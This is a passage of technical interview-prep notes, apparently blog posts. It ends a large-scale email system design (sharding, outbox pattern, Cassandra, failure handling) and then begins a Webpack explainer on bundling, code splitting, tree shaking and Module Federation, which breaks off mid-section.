Here's the problem we're solving: No two users can register with the same email ID. At 1.5B users, a single PostgreSQL instance can't hold all records or serve 50M autocomplete lookups/sec. How do we enforce global uniqueness while sharding?

Naive solution: Single DB, email as primary key. Enforces uniqueness trivially. Fails at scale — table too large, single point of failure.

Chosen solution — Consistent Hashing + Primary Key constraint:

Hash the email ID → its position on the hash ring assigns it to a shard.
Consistent hashing ring (not simple modulo): adding a shard only redistributes a fraction of keys, not all of them. With simple modulo and 10 shards, adding shard 11 remaps every key whose hash % 10 ≠ hash % 11, which is roughly 10 out of every 11 keys. With consistent hashing, only keys on the affected arc move.
Each shard has email_id as PRIMARY KEY — DB-level uniqueness enforced within the shard.
Concurrent registration race condition: Two users try alice@gmail.com simultaneously on the same shard. PRIMARY KEY constraint rejects the second insert. First commit wins — ACID guarantee.

User Cache for autocomplete:

Redis cache per user: stores top 50 recently-contacted email IDs + all contact book entries. TTL = session duration.
On typing in To/CC field: check user cache first. Cache hit → show autocomplete. Cache miss (unknown email) → no suggestion until user presses Enter → DB lookup only on explicit intent.
Why cache? At 50M autocomplete lookups/sec × 10ms per sharded-DB lookup, the DB fleet would spend 500K seconds of lookup time per second. The cache serves the same request in < 1ms.

[!NOTE]
Key Insight: Uniqueness is enforced at the shard level via PRIMARY KEY, not via a global lock or cross-shard lookup. Consistent hashing guarantees each email maps to exactly one shard. Two registrations for the same email ID always land on the same shard — DB constraint handles the race.
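The race is resolved entirely by the constraint. A minimal sketch, with SQLite standing in for one PostgreSQL shard; the `register` helper and the single-column table are assumptions for the example.

```python
import sqlite3


def register(conn: sqlite3.Connection, email_id: str) -> bool:
    """Return True if the address was claimed, False if it was already taken."""
    try:
        with conn:  # commit on success, roll back on constraint violation
            conn.execute("INSERT INTO users (email_id) VALUES (?)", (email_id,))
        return True
    except sqlite3.IntegrityError:
        return False  # PRIMARY KEY rejected the duplicate insert


# One in-memory database plays the role of the shard that owns this email ID.
shard = sqlite3.connect(":memory:")
shard.execute("CREATE TABLE users (email_id TEXT PRIMARY KEY)")
```

The application never checks "does this email exist?" before inserting. It inserts and lets the database decide, so there is no window between check and write for a second registration to slip through.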

10. Bottlenecks & Scaling

Scale we're designing for (say this explicitly in the interview):

1.5 billion users. ~300 billion emails/day. 3.5 million emails/sec at peak.
22.5 exabytes total storage. 260 GB/sec of mailbox write throughput.
The sharding strategy for this scale: partition mailbox by user_id. Every inbox query and every inbox write is WHERE user_id = ? — so every operation hits exactly one Cassandra partition. No scatter-gather. No cross-shard joins. This is intentional by design, not coincidence.

What breaks first at 10× scale:

Mailbox writes (35M emails/sec):
- Cassandra sharded by user_id handles this. Add nodes horizontally — Cassandra rebalances automatically.
- Read path: SELECT * FROM mailbox_items WHERE user_id = ? ORDER BY message_id DESC LIMIT 50 — single partition scan, fast.
Search at 100M QPS:
- Elasticsearch cluster with data nodes sharded by user_id. Each user's emails live on the same shard — no scatter-gather.
- Aggregator Service pre-joins body + metadata before indexing. Never join at query time.
- Cache recent search results in Redis: search:{userId}:{queryHash} → result TTL = 5 min.
SMTP Relay Worker saturation:
- Stateless workers — scale horizontally. Each worker handles its own TCP connection pool to external SMTP servers.
- Per-domain connection pooling: opening a new TCP + TLS connection to Outlook per email is expensive. Maintain persistent connection pools per domain.
- MX Cache hit rate target: > 99% (most emails go to top 10 domains — Gmail, Outlook, Yahoo, corporate domains).
User DB autocomplete (50M QPS):
- Served from User Cache (Redis) for 95%+ of requests.
- User DB only hit on cache miss (unknown email + Enter key). Read replicas absorb the remaining load.

11. Failure Scenarios

Failure	Impact	Recovery
Mail Send Service crashes after Outbox write	No impact	Outbox Consumer retries Kafka publish. Email not lost — it's in the DB.
Kafka broker goes down	Email delivery stalls	Outbox Consumer retries with backoff. Emails queue up in Outbox Table. Kafka cluster is multi-broker, so a single broker failure doesn't take down the cluster.
Validation service (spam/policy) goes down	Emails pile up in Delay Queue	After timeout, moved to Delay Queue, retried on recovery. Does not block all emails — only those awaiting that specific check.
SMTP Relay Worker can't reach Outlook	External email delayed	Exponential backoff retry. Try next-priority MX record. Industry-standard: retry for up to 4 days before bouncing.
Cassandra node fails	Reduced redundancy (and possibly higher latency) for the affected partition range	Replication factor = 3. With quorum reads/writes, the remaining replicas keep serving requests. No data loss.
Elasticsearch node fails	Search degraded	Replica shards are promoted and the cluster rebalances onto healthy nodes. Search may be slow during rebalance but stays available as long as every shard has a surviving copy.
S3 outage	Attachment upload fails	Client retries. Draft saves without attachment. Email can't be sent until attachment upload succeeds — enforced client-side.
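
The SMTP retry behaviour in the table (exponential backoff, next-priority MX record, give up after about 4 days) can be sketched as follows. The base delay, the per-attempt cap, and the round-robin MX rotation are assumptions chosen for illustration; production relays usually add random jitter as well.

```javascript
// Assumed policy values; the text only fixes the overall 4-day window.
const FOUR_DAYS_S = 4 * 24 * 60 * 60;

// Returns the delay (seconds) before each retry: base, 2*base, 4*base, ...
// capped at maxDelayS, stopping once the cumulative wait would exceed the window.
function retryDelays(baseS = 60, maxDelayS = 6 * 60 * 60, windowS = FOUR_DAYS_S) {
  const delays = [];
  let elapsed = 0;
  for (let attempt = 0; ; attempt++) {
    const delay = Math.min(baseS * 2 ** attempt, maxDelayS);
    if (elapsed + delay > windowS) break; // out of budget: bounce the message
    delays.push(delay);
    elapsed += delay;
  }
  return delays;
}

// Picks the MX host for a given attempt: lowest preference value first,
// rotating to the next record on each subsequent attempt.
// Records use the { priority, exchange } shape returned by Node's dns.resolveMx.
function pickMx(mxRecords, attempt) {
  const sorted = [...mxRecords].sort((a, b) => a.priority - b.priority);
  return sorted[attempt % sorted.length].exchange;
}
```

Once retryDelays is exhausted the worker would mark the message BOUNCED, which matches the "DELIVERED or BOUNCED, never silently lost" end state described for the reliable path.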

12. Trade-offs

Cassandra vs PostgreSQL for Mailbox

Dimension	Cassandra	PostgreSQL
Write throughput	Multi-master, linear scale (35M writes/sec)	Single primary ~100K writes/sec ceiling
Query flexibility	Limited — must know partition key	Full SQL, joins, complex queries
Consistency	Eventual (tunable quorum)	Strong ACID
Operational complexity	Higher — tuning compaction, GC	Lower

Chosen: Cassandra — mailbox is write-heavy (every email = inbox write), append-only, always queried by user_id. No joins needed. PostgreSQL primary would be the first bottleneck at scale.

[!NOTE]
Key Insight: Mailbox is an append-only, partition-by-user workload. Cassandra's partition model is a perfect fit — every query is WHERE user_id = ? and every write is to a known partition. No cross-partition queries ever needed.

Sync vs Async Delivery Pipeline

Dimension	Sync (direct call)	Async (Kafka + Outbox)
Simplicity	Simple — no queue	Complex — CDC + Kafka + consumers
Durability	Email lost if service crashes	Zero loss — email persisted before Kafka
Validation	Blocks send response	Non-blocking — UI shows "Sent" immediately
Scale	Each service must scale with send rate	Each stage scales independently

Chosen: Async — at 3.5M emails/sec, synchronous validation would require every validation service to handle 3.5M req/sec simultaneously or become the bottleneck. Async decouples each stage.

[!NOTE]
Key Insight: The queue is not a performance optimization — it's a correctness requirement. Without the Outbox Table + Kafka, a service crash between "email saved" and "email delivered" loses the email permanently.
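
A minimal in-memory sketch of the outbox idea follows. It assumes a polling relay rather than the CDC pipeline the design describes, and db, publish, and the consumer are hypothetical stand-ins for the mail database, the Kafka producer, and the delivery consumer.

```javascript
// In-memory stand-in (assumption) for the mail database.
function createDb() {
  return { emails: new Map(), outbox: [] };
}

// Both rows are written in one step; in a real database this is one transaction.
function sendEmail(db, email) {
  db.emails.set(email.id, { ...email, status: 'QUEUED' });
  db.outbox.push({ emailId: email.id, published: false });
}

// Relay: publish every unpublished outbox row; mark it only after publish succeeds.
// A crash between publish and mark causes a re-publish, hence at-least-once delivery.
function relayOutbox(db, publish) {
  for (const row of db.outbox) {
    if (row.published) continue;
    try {
      publish({ emailId: row.emailId });
      row.published = true;
    } catch (err) {
      // Leave the row unpublished; the next relay pass retries it.
    }
  }
}

// Consumer: deduplicate by emailId so redelivered messages are harmless.
function createConsumer() {
  const seen = new Set();
  const delivered = [];
  return {
    delivered,
    handle(message) {
      if (seen.has(message.emailId)) return;
      seen.add(message.emailId);
      delivered.push(message.emailId);
    },
  };
}
```

The email row exists before any publish is attempted, so a broker outage only delays delivery. The deduplicating consumer is what makes the resulting at-least-once stream safe.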

Pre-scan Attachments vs Scan at Send Time

Dimension	Pre-scan at upload	Scan at send time
Send latency	Zero — result pre-computed	+200–500ms per attachment
Resource usage	Scanning at low-traffic upload time	Scanning during high-traffic send window
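Stale scan risk	None, provided each upload gets its own object key (an S3 object cannot be edited in place)	N/A

Chosen: Pre-scan at upload. Scanning a 25MB PDF at send time adds unacceptable latency to the hot send path. S3 objects cannot be modified in place, so as long as every upload is written under its own key and never overwritten, a scan result from upload time stays valid.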

[!NOTE]
Key Insight: Move expensive work out of the critical path. Attachment scanning is O(file_size) — it belongs at upload time (low frequency, user is waiting anyway) not at send time (high frequency, user expects instant delivery).

Frontend Notes (10% of design)

Component	Pattern	Why it matters in an interview
Inbox list	Cursor-based pagination; metadata only (no body)	3.5M emails/sec × full body = 260GB/sec read traffic. Only load body on open.
Virtual scroll	Virtualise DOM — only render visible email rows	A user with 50K emails in inbox = 50K DOM nodes if fully rendered. Browser crashes.
New email notification	WebSocket connection to Notification Service	Polling alternative = wasted requests every 15 seconds. WebSocket = server-pushed on new delivery event.
Inbox caching	Cache first 2 pages of inbox in IndexedDB (client)	Gmail opens instantly because the last-seen inbox is stored locally. Background refresh fetches newer emails.
Optimistic send	Mark email as "Sent" in UI immediately on `202 Accepted`	Async pipeline means the server can't confirm delivery synchronously. Show optimistic state; surface later failures (for example a bounce) through the notification channel.
Draft autosave	Debounce 2 seconds after last keystroke → `PATCH /draft/:id`	Without debounce: typing at 60 WPM × autosave per keystroke = ~5 API calls/sec per composer window.
Attachment upload	Direct client → S3 via pre-signed URL; progress bar from S3 multipart upload events	Don't route 25MB files through your API servers — direct S3 upload offloads bandwidth entirely.
Search	Debounce search input 300ms; show skeleton loaders	Elasticsearch at < 500ms feels instant if UI provides loading feedback. Don't block compose on search.
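
The debounce used for draft autosave and search input can be sketched as below. The timers parameter is an assumption added so the sketch can run against a fake clock; saveDraft, draftId, and editor in the commented usage are hypothetical names.

```javascript
// Default timers wrap the platform functions (calling setTimeout as a method
// of another object throws "Illegal invocation" in browsers).
const realTimers = {
  set: (callback, ms) => setTimeout(callback, ms),
  clear: (handle) => clearTimeout(handle),
};

function debounce(fn, waitMs, timers = realTimers) {
  let handle = null;
  return (...args) => {
    if (handle !== null) timers.clear(handle); // a newer keystroke cancels the pending save
    handle = timers.set(() => {
      handle = null;
      fn(...args); // fires once, with the latest arguments
    }, waitMs);
  };
}

// Hypothetical usage: saveDraft would issue PATCH /draft/:id.
// const autosave = debounce((body) => saveDraft(draftId, body), 2000);
// editor.addEventListener('input', (event) => autosave(event.target.value));
```

Only the last call inside each quiet period reaches the server, which is what turns roughly 5 requests per second of typing into one request per pause.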

Interview Summary

Key Decisions

Decision	Problem it solves	Trade-off accepted
Transactional Outbox Pattern	Zero email loss on service crash	CDC pipeline complexity; at-least-once delivery (idempotency needed at consumer)
Cassandra for Mailbox Items	35M writes/sec inbox delivery	Eventual consistency; limited query flexibility (no joins)
Pre-computed attachment scans	Keep send path fast	S3 Validation DB must be maintained; small storage overhead
Consistent hashing for User DB	Shard 1.5B users without remapping all keys on scale-out	More complex routing layer vs simple modulo sharding
Async parallel validation	Avoid blocking send on slow/down validation services	Eventual delivery (email delayed, not blocked, on service outage)
Separate mailbox body + metadata	Inbox listing and search indexing without reading full bodies (the aggregator pre-joins at index time)	Two tables to maintain; aggregator service adds complexity
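
The consistent hashing row can be made concrete with a small hash ring. This is a sketch under assumptions: MD5 as the hash, 100 virtual nodes per shard, and shard names such as shard-a are all illustrative, not values taken from the design.

```javascript
const { createHash } = require('node:crypto');

// Map a string to an unsigned 32-bit position on the ring.
function ringPosition(value) {
  return createHash('md5').update(value).digest().readUInt32BE(0);
}

class HashRing {
  // virtualNodes per shard is an assumed tuning knob to even out the distribution.
  constructor(shards = [], virtualNodes = 100) {
    this.virtualNodes = virtualNodes;
    this.points = []; // sorted array of { position, shard }
    shards.forEach((shard) => this.addShard(shard));
  }

  addShard(shard) {
    for (let i = 0; i < this.virtualNodes; i++) {
      this.points.push({ position: ringPosition(`${shard}#${i}`), shard });
    }
    this.points.sort((a, b) => a.position - b.position);
  }

  // Owner = first point clockwise from the key's position (wrapping to the start).
  shardFor(key) {
    const target = ringPosition(key);
    let lo = 0;
    let hi = this.points.length;
    while (lo < hi) {
      const mid = (lo + hi) >> 1;
      if (this.points[mid].position < target) lo = mid + 1;
      else hi = mid;
    }
    return this.points[lo % this.points.length].shard;
  }
}
```

The same email address always hashes to the same shard, and adding a shard moves only the keys that the new shard takes over. With modulo sharding, changing the shard count would remap most keys.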

Fast Path vs Reliable Path

FAST PATH (optimized for perceived send latency)
  User clicks Send
      │
      ▼
  Mail Send Service writes to Outbox Table (DB write = durable)
      │
  UI immediately shows "Message Sent" ← user feedback is instant
      │
  Outbox Consumer detects CDC event → Kafka (async, non-blocking)


RELIABLE PATH (optimized for zero email loss)
  If Kafka publish fails → Outbox Consumer retries from DB
  If Delivery Orchestrator crashes → resumes from Kafka offset
  If Validation service down → email moves to Delay Queue, retried on recovery
  If SMTP handshake fails → exponential backoff, try next MX record, retry up to 4 days
  Final state: email always reaches DELIVERED or BOUNCED — never silently lost

Key Insights Checklist

"The Outbox Table makes DB write and Kafka publish effectively atomic. DB is the source of truth, not Kafka. Email is never lost because the persistent record exists before any async work begins."
"Attachment scanning is pre-computed at upload time. By send time, the result is a single Redis lookup. Scanning at send time would add 200–500ms to every email on the hot path."
"Cassandra partition key is user_id. Every inbox query and every inbox write maps to a single partition. No scatter-gather, no joins. This is why Cassandra is the right choice here — not for its write speed generally, but for this specific access pattern."
"SMTP is a protocol, not a server. Every mail server speaks it. The MX cache avoids DNS lookup per email — at 3.5M cross-domain emails/sec, that's the difference between functional and overloaded."
"Registration must be strongly consistent — email ID as PRIMARY KEY in each DB shard. Consistent hashing guarantees two registrations for the same email ID always land on the same shard. DB constraint handles the race without a global lock."
"The validation pipeline runs in parallel, not serially. Each service writes its result to Validation DB independently. The orchestrator checks when all columns are set — no service blocks another."
"Spam filtering is layered cheapest-first: IP reputation at 1ms eliminates 60% of spam before the ML model ever sees it. Only ~40% of mail needs the 100ms ML inference — this makes the economics work at 3.5M emails/sec."
"Gmail acknowledges 250 Message accepted to external senders before the email reaches the inbox. Once we own the message off the wire, Kafka + Cassandra guarantee delivery. The sender's responsibility ends at 250."
"Rate limiting is a correctness requirement for email. Without it, one compromised account becomes a spam cannon for the entire platform. A Redis sliding window counter at < 1ms cost per send is the cheapest correctness guarantee in the system."

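The per-account rate limit from the last checklist item could look roughly like this. It is a sliding-window log kept in memory, which is a simpler relative of the Redis sliding window counter the text mentions; the limit and window values are illustrative assumptions.

```javascript
// In-memory stand-in for the Redis-backed limiter (assumption).
class SlidingWindowLimiter {
  constructor(limit, windowMs) {
    this.limit = limit;
    this.windowMs = windowMs;
    this.sends = new Map(); // userId -> timestamps (ms) of recent sends
  }

  // Returns true and records the send if the user is under the limit.
  allow(userId, now = Date.now()) {
    const cutoff = now - this.windowMs;
    const recent = (this.sends.get(userId) || []).filter((t) => t > cutoff);
    const allowed = recent.length < this.limit;
    if (allowed) recent.push(now);
    this.sends.set(userId, recent);
    return allowed;
  }
}
```

Limits are tracked per user, so one compromised account hits its ceiling without affecting anyone else's ability to send.
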
Webpack

Arghya Majumder — Tue, 07 Apr 2026 21:15:52 +0000

What is Webpack?

Webpack is a static module bundler for JavaScript applications. It takes your source files — JS, CSS, images, fonts — and bundles them into optimized output files the browser can load.

One-liner: Webpack walks your dependency graph, transforms every file type it encounters (via loaders), and emits optimized bundles (via plugins).

Why Do We Need It?

The Real Root Problem: Browsers Have No Module System

Before ES Modules (ES2015), the browser had one shared global scope for all JavaScript. Every <script> tag dumped its variables into window.

<!-- All three files share window — one global scope -->
<script src="utils.js"></script>    <!-- defines window.helper -->
<script src="lodash.js"></script>   <!-- also defines window._ -->
<script src="app.js"></script>      <!-- must load last or it breaks -->

What this means in practice:

// utils.js
var data = [];          // window.data — global

// vendor.js (some third-party lib)
var data = 'config';   // window.data — OVERWRITTEN silently

// app.js
console.log(data);     // 'config' — not what you expected

- Any script can overwrite any other script's variables, causing silent collisions
- Load order is a runtime contract you must manually maintain
- No way to say "this function belongs to this file only"

The pre-webpack workaround: IIFE (Immediately Invoked Function Expression)

// Each file wraps itself in a function to create a private scope
(function() {
  var data = [];   // scoped to this function, NOT window
  window.MyApp = { data };  // expose only what you want to
})();

Works but: verbose, manual, no dependency tracking, still relies on load order.

CommonJS (Node.js) solved this on the server:

// Node modules have their own scope: no global leak
const data = require('./data');  // isolated
function doSomething() { return data; }  // illustrative function using the import
module.exports = { doSomething };

But browsers couldn't run require() — it's synchronous and browsers load files over the network (async).

Webpack bridges this gap:

Webpack brings the CommonJS/ESM module system to the browser. It takes your import/require calls, resolves the full dependency graph at build time, and emits a single bundle where each module is wrapped in its own function scope — no global leaks.

// What you write
import { add } from './math';
export const result = add(1, 2);

// What webpack emits (simplified)
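(function(modules) {
  var cache = {}; // each module runs once; later requires reuse its exports
  function __webpack_require__(moduleId) {
    if (cache[moduleId]) return cache[moduleId].exports;
    var module = (cache[moduleId] = { exports: {} });
    modules[moduleId](module, module.exports, __webpack_require__);
    return module.exports;
  }
  __webpack_require__(0); // start from entry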
})({
  0: function(module, exports, require) {
    // your index.js — isolated scope
    var math = require(1);
    exports.result = math.add(1, 2);
  },
  1: function(module, exports, require) {
    // your math.js — isolated scope
    exports.add = function(a, b) { return a + b; };
  }
});

Each module is a function. Its variables are local to that function. Zero global scope pollution. This is what webpack actually compiles your code into.

What webpack solves:

Problem	Webpack solution
Global scope collisions	Each module wrapped in its own function scope
50 HTTP requests	Bundle all JS into 1–3 files
`require()` in browser	Webpack's runtime implements `__webpack_require__`
Non-JS assets (CSS, images)	Loaders transform anything into a module
Send only what's needed	Code splitting + lazy loading
Unused code in bundle	Tree shaking removes dead code
Dev feedback speed	Hot Module Replacement (HMR)

Why not just use native ES Modules in the browser?
You can: modern browsers support <script type="module">. But without a build step there is no tree shaking, no control over code splitting, no loader pipeline for CSS/images, no HMR, and a large module graph turns into hundreds of individual network requests. Webpack (or Vite) still wins for production apps.

Core Concepts

1. Entry

The starting point — webpack builds the dependency graph from here.

entry: './src/index.js'
// or multiple entries
entry: { app: './src/app.js', admin: './src/admin.js' }

2. Output

Where and how to emit the bundled files.

output: {
  filename: '[name].[contenthash].js',  // cache busting
  path: path.resolve(__dirname, 'dist')
}

3. Loaders

Webpack only understands JS and JSON by default. Loaders transform other file types into modules.

module: {
  rules: [
    { test: /\.jsx?$/, use: 'babel-loader' },   // JSX → JS
    { test: /\.css$/, use: ['style-loader', 'css-loader'] },
    { test: /\.png$/, type: 'asset/resource' }  // images
  ]
}

Loaders run right to left in the use array — css-loader first (resolves imports), then style-loader (injects into DOM).
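
The right-to-left order can be illustrated with two toy loaders. These are plain string functions standing in for css-loader and style-loader, not the real packages, and webpack's actual loader runner also has a left-to-right "pitch" phase that this sketch leaves out.

```javascript
// Toy loaders: each takes a source string and returns a transformed string.
const toyCssLoader = (css) => `module.exports = ${JSON.stringify(css)};`;
const toyStyleLoader = (js) => `${js}\n/* inject exported CSS into a <style> tag */`;

// Apply the `use` array right to left: the LAST entry sees the raw file first.
function runLoaders(use, source) {
  return use.reduceRight((current, loader) => loader(current), source);
}

const output = runLoaders([toyStyleLoader, toyCssLoader], 'a { color: red; }');
```

Swapping the two entries would hand raw CSS to the style step, which is why the order in the use array matters.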

4. Plugins

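Plugins hook into the whole compilation lifecycle rather than transforming one file at a time, so they can do things loaders cannot: inject HTML, extract CSS, define build-time constants.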

plugins: [
  new HtmlWebpackPlugin({ template: './index.html' }),  // injects <script> tags
  new MiniCssExtractPlugin({ filename: '[name].css' }), // extracts CSS to file
  new webpack.DefinePlugin({ 'process.env.NODE_ENV': '"production"' })
]

5. Mode

mode: 'development' | 'production' | 'none'

Mode	What it does
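`development`	Fast eval devtool, readable module and chunk names, no minification (HMR is provided by webpack-dev-server's hot option, not by the mode itself)
`production`	Minification, tree shaking, scope hoisting, deterministic module and chunk IDs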

How Webpack Works — Internally

Dependency graph example:

Everything is a module — CSS, images, fonts. Webpack handles them all through loaders.
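
As a rough illustration of how a dependency graph is built from an entry point, the sketch below walks a hypothetical in-memory file map. The regex-based import scanner is an assumption made for brevity; webpack itself parses each module into an AST and uses a full resolver.

```javascript
// Hypothetical in-memory "file system": path -> source text.
const files = {
  './index.js': "import { add } from './math.js';\nimport './styles.css';",
  './math.js': "import { log } from './log.js';\nexport const add = (a, b) => a + b;",
  './log.js': 'export const log = console.log;',
  './styles.css': 'body { margin: 0; }',
};

// Naive import scanner; real bundlers parse an AST and run a resolver instead.
function findImports(source) {
  const pattern = /import\s+(?:[^'"]*?from\s+)?['"]([^'"]+)['"]/g;
  return [...source.matchAll(pattern)].map((match) => match[1]);
}

// Breadth-first walk from the entry, recording each module's dependencies once.
function buildGraph(entry, fileMap) {
  const graph = new Map();
  const queue = [entry];
  while (queue.length > 0) {
    const id = queue.shift();
    if (graph.has(id)) continue; // already visited (also guards against cycles)
    const deps = id.endsWith('.js') ? findImports(fileMap[id]) : [];
    graph.set(id, deps);
    queue.push(...deps);
  }
  return graph;
}
```

The CSS file appears in the graph as a node like any other, which is the sense in which everything is a module.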

Chunks & Code Splitting

A chunk is a group of modules that get emitted as a single output file.

Types of Chunks

Chunk type	Description
Initial chunk	The main bundle loaded on page start
Async chunk	Lazy-loaded chunk created by dynamic `import()`
Runtime chunk	Webpack's internal module loading logic

Why Code Splitting?

Without it, 1 giant bundle → user downloads all code upfront even for pages they never visit.

Dynamic Import (lazy loading)

// Loaded only when user navigates to /dashboard
const Dashboard = React.lazy(() => import('./Dashboard'));

Webpack sees import() and creates a separate async chunk — loaded on demand.

SplitChunksPlugin (vendor splitting)

optimization: {
  splitChunks: {
    chunks: 'all',         // split async AND initial chunks
    cacheGroups: {
      vendor: {
        test: /node_modules/,
        name: 'vendors',   // react, lodash → vendors.js (cached separately)
      }
    }
  }
}

Why split vendors? Your app code changes on every deploy. node_modules rarely change. Separate chunks → vendors.js stays cached in the browser even after app updates.

Without splitting:   bundle.js (2MB)  → all users re-download 2MB every deploy
With splitting:      app.js (200KB)   → re-downloaded on deploy
                     vendors.js (1.8MB) → cached long-term (no change)

Styles

Three ways to handle CSS:

1. style-loader + css-loader (development)

{ test: /\.css$/, use: ['style-loader', 'css-loader'] }

css-loader: resolves @import and url(), converts CSS to JS module
style-loader: injects <style> tag into DOM at runtime

Problem: CSS is bundled inside JS → flash of unstyled content; no browser caching for CSS separately.

2. MiniCssExtractPlugin (production)

{ test: /\.css$/, use: [MiniCssExtractPlugin.loader, 'css-loader'] }

Extracts CSS into separate .css files → loaded in parallel with JS, browser-cached independently.

3. CSS Modules

{ test: /\.css$/, use: ['style-loader', { loader: 'css-loader', options: { modules: true } }] }

Locally scoped class names — styles.button becomes _src_Button_button_abc123 — zero global conflicts.

Tree Shaking

Removes dead code (exported but never imported) from the final bundle.

// utils.js
export const add = (a, b) => a + b;
export const subtract = (a, b) => a - b; // never used anywhere

// app.js
import { add } from './utils';  // only 'add' imported

Webpack in production mode: subtract is never imported → eliminated from bundle.

Requirements for tree shaking:

- ES Modules (import/export), NOT CommonJS (require)
- "sideEffects": false in package.json (or list files with side effects)
- mode: 'production'

Module Federation

Problem it solves: You have 5 micro-frontends, each a separate webpack build. How do they share React without bundling it 5 times? How can App A expose a <Header> component that App B consumes at runtime — without rebuilding either?

Module Federation allows separate webpack builds to share modules at runtime — across different deployments.

Key concepts

Term	Meaning
Host	The app that consumes remote modules
Remote	The app that exposes modules for others to consume
Shared	Libraries loaded only once (e.g. React, ReactDOM)
Exposes	What the remote makes available

Example

// Remote app (header-app/webpack.config.js)
new ModuleFederationPlugin({
  name: 'headerApp',
  filename: 'remoteEntry.js',       // manifest file — loaded by hosts
  exposes: {
    './Header': './src/Header.jsx', // what we share
  },
  shared: { react: { singleton: true }, 'react-dom': { singleton: true } }
})

// Host app (shell/webpack.config.js)
new ModuleFederationPlugin({
  name: 'shell',
  remotes: {
    headerApp: 'headerApp@https://header.example.com/remoteEntry.js'
  },
  shared: { react: { singleton: true }, 'react-dom': { singleton: true } }
})

// Usage in host
const Header = React.lazy(() => import('headerApp/Header'));

What happens at runtime:

1. Host loads remoteEntry.js from the remote's URL
2. Remote's module map is registered in the browser
3. import('headerApp/Header') fetches only that component's chunk
4. React is shared: loaded once, not duplicated across all apps

Why it matters:

- Independent deployments: header team deploys without rebuilding shell
- Shared dependencies: React loaded once across all micro-frontends
- Runtime composition: apps can even load different versions of a remote

The Global Scope Trick — How Module Federation Actually Works

This is the tricky part interviewers love. Module Federation deliberately uses the browser's global scope to coordinate between independently built apps.

Webpack normally fights against global scope (wraps everything in module functions). But for Module Federation to work across separately deployed apps, it intentionally uses window (globalThis) as a shared registry.

Step 1 — Remote registers itself on window:

When the browser loads remoteEntry.js, webpack executes:

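// remoteEntry.js (auto-generated by webpack; simplified pseudo-code)
var headerApp;          // top-level var in a classic script → window.headerApp
// ...
// __webpack_expose_module__ is a placeholder name here, not a real webpack identifier
self["headerApp"] = __webpack_expose_module__(/* module map */);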

So window.headerApp is now a container object with two methods:

window.headerApp.init(sharedScope) — initializes shared modules
window.headerApp.get('./Header') — returns a factory for the Header module

Step 2 — Host accesses it via the global:

// Host runtime (simplified)
const container = window['headerApp'];  // global lookup
await container.init(__webpack_share_scopes__.default);
const factory = await container.get('./Header');
const Header = factory();  // actual React component

import('headerApp/Header') in your code is syntax sugar — webpack compiles it into this global lookup under the hood.

Step 3 — Shared scope coordinates React (avoiding duplicates):

// __webpack_share_scopes__.default: lives in the host's webpack runtime (not on window) and is handed to each remote via container.init()
{
  "react": {
    "18.2.0": {
      get: () => Promise.resolve(() => require('react')),
      loaded: true,
      from: 'shell'   // which app loaded it first
    }
  }
}

When the remote tries to load React, it first checks the share scope it received in container.init(). React is already there (registered by the host) → reuses it. This is how one React instance is shared across 5 micro-frontend apps.
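
The share scope lookup can be approximated with a few functions. This is a simplified model and not webpack's runtime: registerShared, compareVersions, and resolveSingleton are hypothetical names, versions are compared as dotted numbers only (no semver ranges), and the singleton rule is reduced to "highest registered version wins".

```javascript
// Simplified share scope: name -> version -> { get, from }.
function registerShared(scope, name, version, factory, from) {
  scope[name] = scope[name] || {};
  if (!scope[name][version]) {
    scope[name][version] = { get: factory, from }; // first registrant of a version wins
  }
}

// Compare dotted numeric versions, e.g. '18.10.0' > '18.2.0'.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const diff = (pa[i] || 0) - (pb[i] || 0);
    if (diff !== 0) return diff;
  }
  return 0;
}

// Singleton resolution: every consumer receives the same (highest) version.
function resolveSingleton(scope, name) {
  const versions = Object.keys(scope[name] || {}).sort(compareVersions);
  if (versions.length === 0) throw new Error(`Shared module ${name} is not registered`);
  const chosen = versions[versions.length - 1];
  return { version: chosen, ...scope[name][chosen] };
}
```

Because host and remote resolve against the same scope object, both end up calling the same factory and therefore get the same module instance.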

Why this is the trick:

Normal webpack:    window pollution = BAD (modules wrapped in functions)
Module Federation: window pollution = DELIBERATE (cross-app coordination)

MF has no choice — two separately built, separately deployed apps have no other shared channel except the browser's global scope. There's no import statement that works across deployment boundaries at runtime. The global registry IS the communication protocol.

What can go wrong:

- window.headerApp is undefined → remoteEntry.js didn't load (network failure, wrong URL)
- React version mismatch → if singleton: true is not set and the required versions are incompatible, each app loads its own React → hooks break (React requires exactly one instance)
- Init order race → host must await container.init() before calling container.get(); skipping the await surfaces as errors such as "cannot read property of undefined"

Passing Data: Host → Remote (Module Federation)

This is a common interview follow-up: "You've loaded a remote component — how do you pass data to it?"

Module Federation loads remote components lazily at runtime. They are still React components — but the trick is they live in a different webpack scope (different build, different __webpack_require__). Data passing strategies ranked by use case:

Strategy 1 — Props (simplest, most natural)

The remote just exposes a React component. The host passes props like any other component.

// Remote exposes a normal component
// header-app/src/Header.jsx
export default function Header({ user, onLogout }) {
  return <div>Hello {user.name} <button onClick={onLogout}>Logout</button></div>;
}

// Host uses it with props
const Header = React.lazy(() => import('headerApp/Header'));

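function Shell({ user }) {
  // React.lazy components must render inside a Suspense boundary
  return (
    <React.Suspense fallback={null}>
      <Header user={user} onLogout={() => logout()} />
    </React.Suspense>
  );
}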

Works perfectly. The component boundary is normal React — props flow as usual. The webpack complexity is invisible at this level.

Limitation: Props only flow down. Remote can't push data back up without callbacks. Fine for display components, limiting for complex state.

Strategy 2 — Exposed API / Hook (remote → host)

The reverse of props. Instead of the host pushing data down, the remote exposes its own hooks, functions, or store actions — and the host imports and uses them directly. The remote owns the data; the host just pulls from it.

// cart-app/webpack.config.js — remote exposes its own API surface
new ModuleFederationPlugin({
  name: 'cartApp',
  exposes: {
    './useCart':   './src/hooks/useCart',    // hook
    './cartStore': './src/store/cartStore',  // store actions
  }
})

// cart-app/src/hooks/useCart.js: remote owns this data
import { useState } from 'react';
export function useCart() {
  const [items, setItems] = useState([]);
  const addItem   = (item) => setItems(prev => [...prev, item]);
  const removeItem = (id)  => setItems(prev => prev.filter(i => i.id !== id));
  return { items, count: items.length, addItem, removeItem };
}

// Host imports and uses the remote's hook — host never manages cart state
import { useCart } from 'cartApp/useCart';

function ShellHeader() {
  const { count } = useCart(); // remote owns the data, host just reads
  return <Badge count={count} />;
}

function ProductPage({ productId }) {
  const { addItem } = useCart(); // host calls remote's action
  return <button onClick={() => addItem({ id: productId })}>Add to cart</button>;
}

Why this is genuinely different from props:

- Data direction is remote → host (props is host → remote)
